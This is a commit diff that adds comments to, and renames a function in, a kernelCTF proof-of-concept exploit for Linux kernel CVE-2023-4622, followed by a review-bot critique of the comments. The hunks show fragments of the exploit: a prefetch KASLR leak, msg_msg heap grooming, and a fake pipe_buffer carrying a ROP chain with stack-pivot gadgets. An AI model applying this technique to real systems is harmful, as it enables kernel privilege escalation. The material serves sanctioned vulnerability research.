
Commit dddf30b

author
Bing-Jhong Billy Jheng
committed
Add more comments on poc.c for read
1 parent 25c9d28 commit dddf30b


4 files changed

+9
-8
lines changed


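--- a/pocs/linux/kernelctf/CVE-2023-4622_lts/exploit/lts-6.1.36/poc.c
+++ b/pocs/linux/kernelctf/CVE-2023-4622_lts/exploit/lts-6.1.36/poc.c
@@ -185,8 +185,8 @@ size_t mostFrequent(size_t *arr, size_t n)
 
 return element_having_max_freq;
 }
-
-// EntryBleed: Breaking KASLR under KPTI with Prefetch (CVE-2022-4543)
+// Since there no KPTI on the remote server (as its CPU is not affected by Meltdown, so the kernel does not turn on KPTI)
+// so this is actually prefetch attack. ref: https://gruss.cc/files/prefetch.pdf
 void leak()
 {
 size_t kbase[0x8] = {0};
@@ -224,6 +224,7 @@ int setup_msg()
 printf("setup msg start..\n");
 memset(&msg.mtext[0], 0, 0x2000);
 msg.mtype = 1;
+// Removes all of the current user's previously allocated msg_msg structs to aviod reach limits.
 system("ipcrm --all=msg");
 for (int i = 0; i < NUM_QUEUE; i++)
 {
@@ -284,19 +285,19 @@ int setup_msg()
 
 char user_buf[] = "|/proc/%P/fd/666";
 #define ROP(idx) ((size_t *)rop)[(idx) + (START_ROP / 8)]
-int build_rop(size_t rop_addr, char *rop)
+int build_fake_pipe_buffer_with_rop_chain(size_t rop_addr, char *rop)
 {
 *(size_t *)&rop[0x8] = POP_RDI;
 *(size_t *)&rop[0x18] = POP_RSP;
 *(size_t *)&rop[0x20] = rop_addr + START_ROP;
 
 #ifdef LTS
-*(size_t*)&rop[0x10] = rop_addr+0x30;
-*(size_t*)&rop[0x38] = PIVOT3;
+*(size_t*)&rop[0x10] = rop_addr+0x30; //set pipe_buffer.ops
+*(size_t*)&rop[0x38] = PIVOT3; //set pipe_buf_operations.release
 *(size_t*)&rop[0x2e] = PIVOT2;
 #else
-*(size_t *)&rop[0x10] = rop_addr + 0x20;
-*(size_t *)&rop[0x28] = PIVOT3;
+*(size_t *)&rop[0x10] = rop_addr + 0x20; //set pipe_buffer.ops
+*(size_t *)&rop[0x28] = PIVOT3; //set pipe_buf_operations.release
 *(size_t *)&rop[0x39] = PIVOT2;
 #endif
 
@@ -462,7 +463,7 @@ int corrupted_msg()
 
 // prepare fake pipe_buffer and rop payload
 msg.mtype = 6;
-build_rop(known_addr_pipe, &msg.mtext[0x1000 - 0x30 - 8]);
+build_fake_pipe_buffer_with_rop_chain(known_addr_pipe, &msg.mtext[0x1000 - 0x30 - 8]);
 for (int j = 0; j < NUM_QUEUE_RESV; j++)
 {
 // overwrite pipe_buffer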
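Review bot: In the third hunk the new `//set pipe_buffer.ops` and `//set pipe_buf_operations.release` comments annotate the 0x10 and 0x38/0x28 stores, but the `PIVOT2` store at `rop[0x2e]` (LTS branch) and `rop[0x39]` (non-LTS branch) — the least obvious line in each branch, since it is a `size_t` write at an odd, non-8-aligned offset — is still left without any explanation, and a reader cannot tell from the hunk whether the offset is deliberate or a typo; a one-line comment stating why the write sits at that offset (presumably an intentional overlap with the slots written just above — confirm) would make the rename's intent complete. The body of `build_fake_pipe_buffer_with_rop_chain` continues past the end of that hunk, as does `corrupted_msg` in the last one. The comment added in the second hunk has a spelling slip and reads better as `// Remove all of the current user's previously allocated msg_msg structs to avoid hitting the msg limits.`. The replacement comment in the first hunk is also missing a verb; `// There is no KPTI on the remote server (its CPU is not affected by Meltdown, so the kernel does not enable KPTI),` followed by `// so this is actually a prefetch side-channel attack. ref: https://gruss.cc/files/prefetch.pdf` keeps the same content and is easier to read.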
